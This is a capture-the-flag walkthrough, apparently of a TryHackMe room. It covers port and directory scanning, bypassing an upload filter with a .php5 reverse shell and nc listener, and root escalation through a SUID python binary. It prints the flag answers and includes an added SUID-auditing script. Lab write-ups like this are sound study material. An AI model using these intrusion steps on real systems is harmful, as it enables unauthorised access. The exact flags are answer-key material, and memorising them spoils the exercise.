Reconnaissance
Scan the machine, how many ports are open?
nmap -sV 10.80.157.137
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Answer 2
What version of Apache is running?
Answer 2.4.41
What service is running on port 22?
Answer ssh
Find directories on the web server using the GoBuster tool
Answer gobuster dir -u 10.80.157.137 -w /usr/share/wordlists/dirb/common.txt -x php,html,js,txt,asp,aspx,jsp
What is the hidden directory?
Answer /panel/
Getting a shell
Find a form to upload and get a reverse shell, and find the flag user.txt
Uploaded a php-reverse-shell while running nc on my system, however it looks like .php files are not allowed to be uploaded.
After testing a few different things it looks like you can upload php files with different extensions such as php5. However, after it is uploaded it does not automatically execute; you need to go to the /uploads/ directory and click the php file for the shell to open, or curl the file in another terminal.
nc -lvnp 4444
find / -type f -name user.txt
cat /var/www/user.txt
Answer THM{y0u_g0t_a_sh3ll}
Privilege escalation
Search for files with SUID permission, which file is weird?
This one stumped me. I've not done much with privilege escalation before, so it took me quite a while to figure out what can be used to do this; after finding a repo by gurkylee on linux privilege escalation basics I noticed python can be used.
find / -user root -type f -perm /4000 2>/dev/null
This outputs quite a lot, but it looks like python is in /usr/bin.
Answer /usr/bin/python
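As an added defender-side example (not part of the walkthrough), the script below audits `find / -perm /4000 -ls` output against a baseline of expected SUID binaries and flags interpreters such as the SUID python found here; the baseline list is an assumption and the sample listing is constructed.

```python
# Added audit example (not from the walkthrough): flags SUID files that hand out
# code execution. Input is `find / -perm /4000 -ls` output; the sample is constructed.
import re
from typing import List, Tuple

# Interpreters and shells: SUID root on any of these is effectively a root shell.
RISKY = {"python", "perl", "ruby", "php", "node", "lua", "bash", "sh", "dash", "zsh"}

# SUID root binaries a stock Ubuntu 20.04 ships with (assumed baseline; generate
# your own from a clean image rather than trusting this list).
EXPECTED = {
    "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/passwd", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/fusermount", "/usr/bin/pkexec",
}

SAMPLE = """\
   131101     56 -rwsr-xr-x   1 root root   55528 May 30  2020 /usr/bin/mount
   131158     68 -rwsr-xr-x   1 root root   68208 May 28  2020 /usr/bin/passwd
   131201   3520 -rwsr-xr-x   1 root root 3662032 Jul 30  2020 /usr/bin/python
   262401     20 -rwsr-xr-x   1 root root   16712 Jun 10  2020 /usr/local/bin/backup
"""


def parse_find_ls(text: str) -> List[Tuple[str, str, str]]:
    """Return (path, mode string, owner) for each `find -ls` line."""
    rows = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 11:  # blank or truncated line
            continue
        rows.append((" ".join(f[10:]), f[2], f[4]))
    return rows


def audit_suid(text: str, expected=EXPECTED) -> List[Tuple[str, str, str]]:
    """Return (path, severity, reason) for every SUID file outside the baseline."""
    findings = []
    for path, mode, owner in parse_find_ls(text):
        if len(mode) != 10 or mode[3] not in "sS" or path in expected:
            continue  # not SUID (4th mode char), or a known-good binary
        base = re.sub(r"[\d.]+$", "", path.rsplit("/", 1)[-1])  # python3.8 -> python
        if base in RISKY:
            findings.append((path, "critical", f"SUID interpreter/shell owned by {owner}"))
        else:
            findings.append((path, "review", f"unexpected SUID file owned by {owner}"))
    return findings
```

Run against the sample it reports /usr/bin/python as critical and /usr/local/bin/backup for review, while the stock binaries are silently accepted.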
Find a form to escalate your privileges
I've never tried privilege escalation with python, but there is a section in the repo I found for abusing sudo binaries to gain root. There is a python section there that works without using sudo, which gives you root.
python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
root.txt
Now we have root we can search for root.txt
find / -type f -name root.txt 2>/dev/null
/root/root.txt
cat /root/root.txt
Answer THM{pr1v1l3g3_3sc4l4t10n}